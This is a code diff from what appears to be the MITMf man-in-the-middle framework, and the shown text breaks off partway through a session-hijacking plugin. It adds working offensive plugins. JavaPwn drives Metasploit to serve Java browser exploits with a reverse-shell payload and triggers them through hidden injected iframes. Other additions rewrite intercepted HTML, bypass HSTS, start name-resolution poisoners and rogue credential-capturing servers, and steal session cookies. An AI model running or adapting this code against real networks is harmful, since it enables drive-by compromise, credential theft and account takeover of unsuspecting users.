#If you have MSF on another host, you may need to check prior to injection
|
#If you have MSF on another host, you may need to check prior to injection
|
||||||
#print "http://" + request.client.getRequestHostname() + request.uri
|
#print "http://" + request.client.getRequestHostname() + request.uri
|
||||||
ip, hn, mime = self._get_req_info(request)
|
ip, hn, mime = self._get_req_info(request)
|
||||||
if self._should_inject(ip, hn, mime) and (not self.js_src == self.html_src is not None or not self.html_payload == ""):
|
if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and (hn not in self.proxyip):
|
||||||
if hn not in self.proxyip: #prevents recursive injecting
|
if (not self.js_src == self.html_src is not None or not self.html_payload == ""):
|
||||||
data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
|
data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
|
||||||
self.ctable[ip] = time.time()
|
self.ctable[ip] = time.time()
|
||||||
self.dtable[ip+hn] = True
|
self.dtable[ip+hn] = True
|
||||||
|
@ -95,39 +83,28 @@ class Inject(CacheKill, Plugin):
|
||||||
def _get_payload(self):
|
def _get_payload(self):
|
||||||
return self._get_js() + self._get_iframe() + self.html_payload
|
return self._get_js() + self._get_iframe() + self.html_payload
|
||||||
|
|
||||||
def add_options(self, options):
|
def _ip_filter(self, ip):
|
||||||
options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
|
|
||||||
options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
|
|
||||||
options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.")
|
|
||||||
options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.")
|
|
||||||
options.add_argument("--match-str", type=str, default="</body>", help="String you would like to match and place your payload before. (</body> by default)")
|
|
||||||
options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.")
|
|
||||||
group = options.add_mutually_exclusive_group(required=False)
|
|
||||||
group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.")
|
|
||||||
group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.")
|
|
||||||
group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.")
|
|
||||||
group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips")
|
|
||||||
group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips")
|
|
||||||
|
|
||||||
def _should_inject(self, ip, hn, mime):
|
|
||||||
|
|
||||||
if self.white_ips is not None:
|
if self.white_ips is not None:
|
||||||
if ip in self.white_ips:
|
if ip in self.white_ips.split(','):
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
if self.black_ips is not None:
|
if self.black_ips is not None:
|
||||||
if ip in self.black_ips:
|
if ip in self.black_ips.split(','):
|
||||||
return False
|
return False
|
||||||
else:
|
else:
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
return True
|
||||||
|
|
||||||
|
def _should_inject(self, ip, hn, mime):
|
||||||
|
|
||||||
if self.count_limit == self.rate_limit is None and not self.per_domain:
|
if self.count_limit == self.rate_limit is None and not self.per_domain:
|
||||||
return True
|
return True
|
||||||
|
|
||||||
if self.count_limit is not None and self.count > self.count_limit:
|
if self.count_limit is not None and self.count > self.count_limit:
|
||||||
#print "1"
|
|
||||||
return False
|
return False
|
||||||
|
|
||||||
if self.rate_limit is not None:
|
if self.rate_limit is not None:
|
||||||
|
@ -176,3 +153,17 @@ class Inject(CacheKill, Plugin):
|
||||||
data = re.sub(r, post[i][1]+"\g<match>", data)
|
data = re.sub(r, post[i][1]+"\g<match>", data)
|
||||||
|
|
||||||
return data
|
return data
|
||||||
|
|
||||||
|
def add_options(self, options):
|
||||||
|
options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
|
||||||
|
options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
|
||||||
|
options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.")
|
||||||
|
options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.")
|
||||||
|
options.add_argument("--match-str", type=str, default="</body>", help="String you would like to match and place your payload before. (</body> by default)")
|
||||||
|
options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.")
|
||||||
|
group = options.add_mutually_exclusive_group(required=False)
|
||||||
|
group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.")
|
||||||
|
group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.")
|
||||||
|
group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.")
|
||||||
|
group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips")
|
||||||
|
group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips")
|
||||||
|
|
231
plugins/JavaPwn.py
Normal file
231
plugins/JavaPwn.py
Normal file
|
@ -0,0 +1,231 @@
|
||||||
|
#!/usr/bin/env python2.7
|
||||||
|
|
||||||
|
# Copyright (c) 2014-2016 Marcello Salvati
|
||||||
|
#
|
||||||
|
# This program is free software; you can redistribute it and/or
|
||||||
|
# modify it under the terms of the GNU General Public License as
|
||||||
|
# published by the Free Software Foundation; either version 3 of the
|
||||||
|
# License, or (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful, but
|
||||||
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||||
|
# General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program; if not, write to the Free Software
|
||||||
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||||
|
# USA
|
||||||
|
#
|
||||||
|
|
||||||
|
import string
|
||||||
|
import random
|
||||||
|
import threading
|
||||||
|
import sys
|
||||||
|
import logging
|
||||||
|
|
||||||
|
from time import sleep
|
||||||
|
from core.msfrpc import Msfrpc
|
||||||
|
from core.utils import SystemConfig
|
||||||
|
from plugins.plugin import Plugin
|
||||||
|
from plugins.BrowserProfiler import BrowserProfiler
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
|
class JavaPwn(BrowserProfiler, Plugin):
|
||||||
|
name = "JavaPwn"
|
||||||
|
optname = "javapwn"
|
||||||
|
desc = "Performs drive-by attacks on clients with out-of-date java browser plugins"
|
||||||
|
tree_output = []
|
||||||
|
version = "0.3"
|
||||||
|
has_opts = False
|
||||||
|
|
||||||
|
def initialize(self, options):
|
||||||
|
'''Called if plugin is enabled, passed the options namespace'''
|
||||||
|
self.options = options
|
||||||
|
self.msfip = SystemConfig.getIP(options.interface)
|
||||||
|
|
||||||
|
try:
|
||||||
|
msfcfg = options.configfile['MITMf']['Metasploit']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing Metasploit options in config file : {}".format(e))
|
||||||
|
|
||||||
|
try:
|
||||||
|
self.javacfg = options.configfile['JavaPwn']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing config for JavaPwn: {}".format(e))
|
||||||
|
|
||||||
|
self.msfport = msfcfg['msfport']
|
||||||
|
self.rpcip = msfcfg['rpcip']
|
||||||
|
self.rpcpass = msfcfg['rpcpass']
|
||||||
|
|
||||||
|
#Initialize the BrowserProfiler plugin
|
||||||
|
BrowserProfiler.initialize(self, options)
|
||||||
|
self.black_ips = []
|
||||||
|
|
||||||
|
try:
|
||||||
|
self.msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary
|
||||||
|
self.msf.login('msf', self.rpcpass)
|
||||||
|
version = self.msf.call('core.version')['version']
|
||||||
|
self.tree_output.append("Connected to Metasploit v{}".format(version))
|
||||||
|
except Exception:
|
||||||
|
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
|
||||||
|
|
||||||
|
def onConfigChange(self):
|
||||||
|
self.initialize(self.options)
|
||||||
|
|
||||||
|
def startThread(self, options):
|
||||||
|
self.pwn()
|
||||||
|
|
||||||
|
def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning)
|
||||||
|
return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5))
|
||||||
|
|
||||||
|
def get_exploit(self, java_version):
|
||||||
|
exploits = []
|
||||||
|
|
||||||
|
client_vstring = java_version[:-len(java_version.split('.')[3])-1]
|
||||||
|
client_uversion = int(java_version.split('.')[3])
|
||||||
|
|
||||||
|
for ver in self.javacfg['Multi'].iteritems():
|
||||||
|
if type(ver[1]) is list:
|
||||||
|
for list_vers in ver[1]:
|
||||||
|
|
||||||
|
version_string = list_vers[:-len(list_vers.split('.')[3])-1]
|
||||||
|
update_version = int(list_vers.split('.')[3])
|
||||||
|
|
||||||
|
if ('*' in version_string[:1]) and (client_vstring == version_string[1:]):
|
||||||
|
if client_uversion == update_version:
|
||||||
|
exploits.append(ver[0])
|
||||||
|
elif (client_vstring == version_string):
|
||||||
|
if client_uversion <= update_version:
|
||||||
|
exploits.append(ver[0])
|
||||||
|
else:
|
||||||
|
version_string = ver[1][:-len(ver[1].split('.')[3])-1]
|
||||||
|
update_version = int(ver[1].split('.')[3])
|
||||||
|
|
||||||
|
if ('*' in version_string[:1]) and (client_vstring == version_string[1:]):
|
||||||
|
if client_uversion == update_version:
|
||||||
|
exploits.append(ver[0])
|
||||||
|
elif client_vstring == version_string:
|
||||||
|
if client_uversion <= update_version:
|
||||||
|
exploits.append(ver[0])
|
||||||
|
|
||||||
|
return exploits
|
||||||
|
|
||||||
|
|
||||||
|
def injectWait(self, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions
|
||||||
|
#inject iframe
|
||||||
|
mitmf_logger.info("{} >> now injecting iframe to trigger exploit".format(client_ip))
|
||||||
|
self.html_payload = "<iframe src='http://{}:{}' height=0%% width=0%%></iframe>".format(self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects
|
||||||
|
|
||||||
|
mitmf_logger.info('{} >> waiting for ze shellz, Please wait...'.format(client_ip))
|
||||||
|
|
||||||
|
exit = False
|
||||||
|
i = 1
|
||||||
|
while i <= 30: #wait max 60 seconds for a new shell
|
||||||
|
if exit:
|
||||||
|
break
|
||||||
|
shell = self.msf.call('session.list') #poll metasploit every 2 seconds for new sessions
|
||||||
|
if len(shell) > 0:
|
||||||
|
for k, v in shell.iteritems():
|
||||||
|
if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted
|
||||||
|
mitmf_logger.info("{} >> Got shell!".format(client_ip))
|
||||||
|
self.sploited_ips.append(client_ip) #target successfuly owned :)
|
||||||
|
self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped
|
||||||
|
exit = True
|
||||||
|
break
|
||||||
|
sleep(2)
|
||||||
|
i += 1
|
||||||
|
|
||||||
|
if exit is False: #We didn't get a shell :(
|
||||||
|
mitmf_logger.info("{} >> session not established after 30 seconds".format(client_ip))
|
||||||
|
|
||||||
|
self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
|
||||||
|
|
||||||
|
def send_command(self, cmd, vic_ip):
|
||||||
|
try:
|
||||||
|
mitmf_logger.info("{} >> sending commands to metasploit".format(vic_ip))
|
||||||
|
|
||||||
|
#Create a virtual console
|
||||||
|
console_id = self.msf.call('console.create')['id']
|
||||||
|
|
||||||
|
#write the cmd to the newly created console
|
||||||
|
self.msf.call('console.write', [console_id, cmd])
|
||||||
|
|
||||||
|
mitmf_logger.info("{} >> commands sent succesfully".format(vic_ip))
|
||||||
|
except Exception, e:
|
||||||
|
mitmf_logger.info('{} >> Error accured while interacting with metasploit: {}:{}'.format(vic_ip, Exception, e))
|
||||||
|
|
||||||
|
def pwn(self):
|
||||||
|
self.sploited_ips = list() #store ip of pwned or not vulnerable clients so we don't re-exploit
|
||||||
|
while True:
|
||||||
|
if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1': #only choose clients that we are 100% sure have the java plugin installed and enabled
|
||||||
|
|
||||||
|
brwprofile = self.dic_output #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format
|
||||||
|
|
||||||
|
if brwprofile['ip'] not in self.sploited_ips: #continue only if the ip has not been already exploited
|
||||||
|
|
||||||
|
vic_ip = brwprofile['ip']
|
||||||
|
|
||||||
|
mitmf_logger.info("{} >> client has java version {} installed! Proceeding...".format(vic_ip, brwprofile['java_version']))
|
||||||
|
mitmf_logger.info("{} >> Choosing exploit based on version string".format(vic_ip))
|
||||||
|
|
||||||
|
exploits = self.get_exploit(brwprofile['java_version']) # get correct exploit strings defined in javapwn.cfg
|
||||||
|
|
||||||
|
if exploits:
|
||||||
|
|
||||||
|
if len(exploits) > 1:
|
||||||
|
mitmf_logger.info("{} >> client is vulnerable to {} exploits!".format(vic_ip, len(exploits)))
|
||||||
|
exploit = random.choice(exploits)
|
||||||
|
mitmf_logger.info("{} >> choosing {}".format(vic_ip, exploit))
|
||||||
|
else:
|
||||||
|
mitmf_logger.info("{} >> client is vulnerable to {}!".format(vic_ip, exploits[0]))
|
||||||
|
exploit = exploits[0]
|
||||||
|
|
||||||
|
#here we check to see if we already set up the exploit to avoid creating new jobs for no reason
|
||||||
|
jobs = self.msf.call('job.list') #get running jobs
|
||||||
|
if len(jobs) > 0:
|
||||||
|
for k, v in jobs.iteritems():
|
||||||
|
info = self.msf.call('job.info', [k])
|
||||||
|
if exploit in info['name']:
|
||||||
|
mitmf_logger.info('{} >> {} already started'.format(vic_ip, exploit))
|
||||||
|
url = info['uripath'] #get the url assigned to the exploit
|
||||||
|
self.injectWait(self.msf, url, vic_ip)
|
||||||
|
|
||||||
|
else: #here we setup the exploit
|
||||||
|
rand_port = random.randint(1000, 65535) #generate a random port for the payload listener
|
||||||
|
rand_url = self.rand_url()
|
||||||
|
#generate the command string to send to the virtual console
|
||||||
|
#new line character very important as it simulates a user pressing enter
|
||||||
|
cmd = "use exploit/{}\n".format(exploit)
|
||||||
|
cmd += "set SRVPORT {}\n".format(self.msfport)
|
||||||
|
cmd += "set URIPATH {}\n".format(rand_url)
|
||||||
|
cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter and its multi-platform
|
||||||
|
cmd += "set LHOST {}\n".format(self.msfip)
|
||||||
|
cmd += "set LPORT {}\n".format(rand_port)
|
||||||
|
cmd += "exploit -j\n"
|
||||||
|
|
||||||
|
mitmf_logger.debug("command string:\n{}".format(cmd))
|
||||||
|
|
||||||
|
self.send_command(cmd, vic_ip)
|
||||||
|
|
||||||
|
self.injectWait(rand_url, vic_ip)
|
||||||
|
else:
|
||||||
|
#this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert)
|
||||||
|
mitmf_logger.info("{} >> client is not vulnerable to any java exploit".format(vic_ip))
|
||||||
|
mitmf_logger.info("{} >> falling back to the signed applet attack".format(vic_ip))
|
||||||
|
|
||||||
|
rand_url = self.rand_url()
|
||||||
|
rand_port = random.randint(1000, 65535)
|
||||||
|
|
||||||
|
cmd = "use exploit/multi/browser/java_signed_applet\n"
|
||||||
|
cmd += "set SRVPORT {}\n".format(self.msfport)
|
||||||
|
cmd += "set URIPATH {}\n".format(rand_url)
|
||||||
|
cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
|
||||||
|
cmd += "set LHOST {}\n".format(self.msfip)
|
||||||
|
cmd += "set LPORT {}\n".format(rand_port)
|
||||||
|
cmd += "exploit -j\n"
|
||||||
|
|
||||||
|
self.send_command(cmd, vic_ip)
|
||||||
|
self.injectWait(rand_url, vic_ip)
|
||||||
|
sleep(1)
|
|
@ -17,10 +17,12 @@
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||||
# USA
|
# USA
|
||||||
#
|
#
|
||||||
|
import logging
|
||||||
|
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from plugins.Inject import Inject
|
from plugins.Inject import Inject
|
||||||
import logging
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
class jskeylogger(Inject, Plugin):
|
class jskeylogger(Inject, Plugin):
|
||||||
name = "Javascript Keylogger"
|
name = "Javascript Keylogger"
|
||||||
|
|
105
plugins/Replace.py
Normal file
105
plugins/Replace.py
Normal file
|
@ -0,0 +1,105 @@
|
||||||
|
#!/usr/bin/env python2.7
|
||||||
|
|
||||||
|
# Copyright (c) 2014-2016 Marcello Salvati
|
||||||
|
#
|
||||||
|
# This program is free software; you can redistribute it and/or
|
||||||
|
# modify it under the terms of the GNU General Public License as
|
||||||
|
# published by the Free Software Foundation; either version 3 of the
|
||||||
|
# License, or (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful, but
|
||||||
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||||
|
# General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program; if not, write to the Free Software
|
||||||
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||||
|
# USA
|
||||||
|
#
|
||||||
|
|
||||||
|
"""
|
||||||
|
Plugin by @rubenthijssen
|
||||||
|
"""
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import logging
|
||||||
|
import time
|
||||||
|
import re
|
||||||
|
from plugins.plugin import Plugin
|
||||||
|
from plugins.CacheKill import CacheKill
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
|
class Replace(CacheKill, Plugin):
|
||||||
|
name = "Replace"
|
||||||
|
optname = "replace"
|
||||||
|
desc = "Replace arbitrary content in HTML content"
|
||||||
|
implements = ["handleResponse", "handleHeader", "connectionMade"]
|
||||||
|
depends = ["CacheKill"]
|
||||||
|
version = "0.1"
|
||||||
|
has_opts = True
|
||||||
|
|
||||||
|
def initialize(self, options):
|
||||||
|
self.options = options
|
||||||
|
|
||||||
|
self.search_str = options.search_str
|
||||||
|
self.replace_str = options.replace_str
|
||||||
|
self.regex_file = options.regex_file
|
||||||
|
|
||||||
|
if (self.search_str is None or self.search_str == "") and self.regex_file is None:
|
||||||
|
sys.exit("[-] Please provide a search string or a regex file")
|
||||||
|
|
||||||
|
self.regexes = []
|
||||||
|
if self.regex_file is not None:
|
||||||
|
for line in self.regex_file:
|
||||||
|
self.regexes.append(line.strip().split("\t"))
|
||||||
|
|
||||||
|
if self.options.keep_cache:
|
||||||
|
self.implements.remove("handleHeader")
|
||||||
|
self.implements.remove("connectionMade")
|
||||||
|
|
||||||
|
self.ctable = {}
|
||||||
|
self.dtable = {}
|
||||||
|
self.mime = "text/html"
|
||||||
|
|
||||||
|
def handleResponse(self, request, data):
|
||||||
|
ip, hn, mime = self._get_req_info(request)
|
||||||
|
|
||||||
|
if self._should_replace(ip, hn, mime):
|
||||||
|
|
||||||
|
if self.search_str is not None and self.search_str != "":
|
||||||
|
data = data.replace(self.search_str, self.replace_str)
|
||||||
|
mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str))
|
||||||
|
|
||||||
|
# Did the user provide us with a regex file?
|
||||||
|
for regex in self.regexes:
|
||||||
|
try:
|
||||||
|
data = re.sub(regex[0], regex[1], data)
|
||||||
|
|
||||||
|
mitmf_logger.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
|
||||||
|
except Exception:
|
||||||
|
logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
|
||||||
|
|
||||||
|
self.ctable[ip] = time.time()
|
||||||
|
self.dtable[ip+hn] = True
|
||||||
|
|
||||||
|
return {'request': request, 'data': data}
|
||||||
|
|
||||||
|
return
|
||||||
|
|
||||||
|
def add_options(self, options):
|
||||||
|
options.add_argument("--search-str", type=str, default=None, help="String you would like to replace --replace-str with. Default: '' (empty string)")
|
||||||
|
options.add_argument("--replace-str", type=str, default="", help="String you would like to replace.")
|
||||||
|
options.add_argument("--regex-file", type=file, help="Load file with regexes. File format: <regex1>[tab]<regex2>[new-line]")
|
||||||
|
options.add_argument("--keep-cache", action="store_true", help="Don't kill the server/client caching.")
|
||||||
|
|
||||||
|
def _should_replace(self, ip, hn, mime):
|
||||||
|
return mime.find(self.mime) != -1
|
||||||
|
|
||||||
|
def _get_req_info(self, request):
|
||||||
|
ip = request.client.getClientIP()
|
||||||
|
hn = request.client.getRequestHostname()
|
||||||
|
mime = request.client.headers['Content-Type']
|
||||||
|
|
||||||
|
return (ip, hn, mime)
|
|
@ -19,18 +19,17 @@
|
||||||
#
|
#
|
||||||
|
|
||||||
import threading
|
import threading
|
||||||
|
import sys
|
||||||
|
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from twisted.internet import reactor
|
from twisted.internet import reactor
|
||||||
from core.utils import SystemConfig
|
from core.utils import SystemConfig
|
||||||
|
|
||||||
from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner
|
from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner
|
||||||
from core.responder.wpad.WPADPoisoner import WPADPoisoner
|
|
||||||
from core.responder.mdns.MDNSPoisoner import MDNSPoisoner
|
from core.responder.mdns.MDNSPoisoner import MDNSPoisoner
|
||||||
from core.responder.nbtns.NBTNSPoisoner import NBTNSPoisoner
|
from core.responder.nbtns.NBTNSPoisoner import NBTNSPoisoner
|
||||||
from core.responder.fingerprinter.LANFingerprinter import LANFingerprinter
|
from core.responder.fingerprinter.LANFingerprinter import LANFingerprinter
|
||||||
from core.responder.wpad.WPADPoisoner import WPADPoisoner
|
from core.responder.wpad.WPADPoisoner import WPADPoisoner
|
||||||
from core.responder.kerberos.KERBServer import KERBServer
|
|
||||||
|
|
||||||
class Responder(Plugin):
|
class Responder(Plugin):
|
||||||
name = "Responder"
|
name = "Responder"
|
||||||
|
@ -48,18 +47,47 @@ class Responder(Plugin):
|
||||||
|
|
||||||
try:
|
try:
|
||||||
config = self.config['Responder']
|
config = self.config['Responder']
|
||||||
|
smbChal = self.config['MITMf']['SMB']['Challenge']
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
sys.exit('[-] Error parsing config for Responder: ' + str(e))
|
sys.exit('[-] Error parsing config for Responder: ' + str(e))
|
||||||
|
|
||||||
LANFingerprinter().start(options)
|
LANFingerprinter().start(options)
|
||||||
MDNSPoisoner().start(options, self.ourip)
|
MDNSPoisoner().start(options, self.ourip)
|
||||||
KERBServer().start()
|
|
||||||
NBTNSPoisoner().start(options, self.ourip)
|
NBTNSPoisoner().start(options, self.ourip)
|
||||||
LLMNRPoisoner().start(options, self.ourip)
|
LLMNRPoisoner().start(options, self.ourip)
|
||||||
|
|
||||||
if options.wpad:
|
if options.wpad:
|
||||||
|
from core.responder.wpad.WPADPoisoner import WPADPoisoner
|
||||||
WPADPoisoner().start(options)
|
WPADPoisoner().start(options)
|
||||||
|
|
||||||
|
if self.config["Responder"]["MSSQL"].lower() == "on":
|
||||||
|
from core.responder.mssql.MSSQLServer import MSSQLServer
|
||||||
|
MSSQLServer().start(smbChal)
|
||||||
|
|
||||||
|
if self.config["Responder"]["Kerberos"].lower() == "on":
|
||||||
|
from core.responder.kerberos.KERBServer import KERBServer
|
||||||
|
KERBServer().start()
|
||||||
|
|
||||||
|
if self.config["Responder"]["FTP"].lower() == "on":
|
||||||
|
from core.responder.ftp.FTPServer import FTPServer
|
||||||
|
FTPServer().start()
|
||||||
|
|
||||||
|
if self.config["Responder"]["POP"].lower() == "on":
|
||||||
|
from core.responder.pop3.POP3Server import POP3Server
|
||||||
|
POP3Server().start()
|
||||||
|
|
||||||
|
if self.config["Responder"]["SMTP"].lower() == "on":
|
||||||
|
from core.responder.smtp.SMTPServer import SMTPServer
|
||||||
|
SMTPServer().start()
|
||||||
|
|
||||||
|
if self.config["Responder"]["IMAP"].lower() == "on":
|
||||||
|
from core.responder.imap.IMAPServer import IMAPServer
|
||||||
|
IMAPServer().start()
|
||||||
|
|
||||||
|
if self.config["Responder"]["LDAP"].lower() == "on":
|
||||||
|
from core.responder.ldap.LDAPServer import LDAPServer
|
||||||
|
LDAPServer().start(smbChal)
|
||||||
|
|
||||||
if options.analyze:
|
if options.analyze:
|
||||||
self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
|
self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
|
||||||
|
|
||||||
|
|
51
plugins/SSLstrip+.py
Normal file
51
plugins/SSLstrip+.py
Normal file
|
@ -0,0 +1,51 @@
|
||||||
|
#!/usr/bin/env python2.7
|
||||||
|
|
||||||
|
# Copyright (c) 2014-2016 Marcello Salvati
|
||||||
|
#
|
||||||
|
# This program is free software; you can redistribute it and/or
|
||||||
|
# modify it under the terms of the GNU General Public License as
|
||||||
|
# published by the Free Software Foundation; either version 3 of the
|
||||||
|
# License, or (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful, but
|
||||||
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||||
|
# General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program; if not, write to the Free Software
|
||||||
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||||
|
# USA
|
||||||
|
#
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import logging
|
||||||
|
|
||||||
|
from plugins.plugin import Plugin
|
||||||
|
from core.utils import IpTables
|
||||||
|
from core.sslstrip.URLMonitor import URLMonitor
|
||||||
|
from core.dnschef.DNSchef import DNSChef
|
||||||
|
|
||||||
|
class HSTSbypass(Plugin):
|
||||||
|
name = 'SSLstrip+'
|
||||||
|
optname = 'hsts'
|
||||||
|
desc = 'Enables SSLstrip+ for partial HSTS bypass'
|
||||||
|
version = "0.4"
|
||||||
|
tree_output = ["SSLstrip+ by Leonardo Nve running"]
|
||||||
|
has_opts = False
|
||||||
|
|
||||||
|
def initialize(self, options):
|
||||||
|
self.options = options
|
||||||
|
self.manualiptables = options.manualiptables
|
||||||
|
|
||||||
|
if not options.manualiptables:
|
||||||
|
if IpTables.getInstance().dns is False:
|
||||||
|
IpTables.getInstance().DNS(options.ip_address, self.config['MITMf']['DNS']['port'])
|
||||||
|
|
||||||
|
URLMonitor.getInstance().setHstsBypass()
|
||||||
|
DNSChef.getInstance().setHstsBypass()
|
||||||
|
|
||||||
|
def finish(self):
|
||||||
|
if not self.manualiptables:
|
||||||
|
if IpTables.getInstance().dns is True:
|
||||||
|
IpTables.getInstance().Flush()
|
187
plugins/SessionHijacker.py
Normal file
187
plugins/SessionHijacker.py
Normal file
|
@ -0,0 +1,187 @@
|
||||||
|
#!/usr/bin/env python2.7
|
||||||
|
|
||||||
|
# Copyright (c) 2014-2016 Marcello Salvati
|
||||||
|
#
|
||||||
|
# This program is free software; you can redistribute it and/or
|
||||||
|
# modify it under the terms of the GNU General Public License as
|
||||||
|
# published by the Free Software Foundation; either version 3 of the
|
||||||
|
# License, or (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful, but
|
||||||
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||||
|
# General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program; if not, write to the Free Software
|
||||||
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||||
|
# USA
|
||||||
|
#
|
||||||
|
|
||||||
|
#Almost all of the Firefox related code was stolen from Firelamb https://github.com/sensepost/mana/tree/master/firelamb
|
||||||
|
import threading
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import time
|
||||||
|
import logging
|
||||||
|
import sqlite3
|
||||||
|
import json
|
||||||
|
import socket
|
||||||
|
|
||||||
|
from plugins.plugin import Plugin
|
||||||
|
from core.publicsuffix.publicsuffix import PublicSuffixList
|
||||||
|
from urlparse import urlparse
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
|
class SessionHijacker(Plugin):
|
||||||
|
name = "Session Hijacker"
|
||||||
|
optname = "hijack"
|
||||||
|
desc = "Performs session hijacking attacks against clients"
|
||||||
|
implements = ["cleanHeaders"] #["handleHeader"]
|
||||||
|
version = "0.1"
|
||||||
|
has_opts = True
|
||||||
|
|
||||||
|
def initialize(self, options):
|
||||||
|
'''Called if plugin is enabled, passed the options namespace'''
|
||||||
|
self.options = options
|
||||||
|
self.psl = PublicSuffixList()
|
||||||
|
self.firefox = options.firefox
|
||||||
|
self.mallory = options.mallory
|
||||||
|
self.save_dir = "./logs"
|
||||||
|
self.seen_hosts = {}
|
||||||
|
self.sql_conns = {}
|
||||||
|
self.sessions = []
|
||||||
|
self.html_header="<h2>Cookies sniffed for the following domains\n<hr>\n<br>"
|
||||||
|
|
||||||
|
#Recent versions of Firefox use "PRAGMA journal_mode=WAL" which requires
|
||||||
|
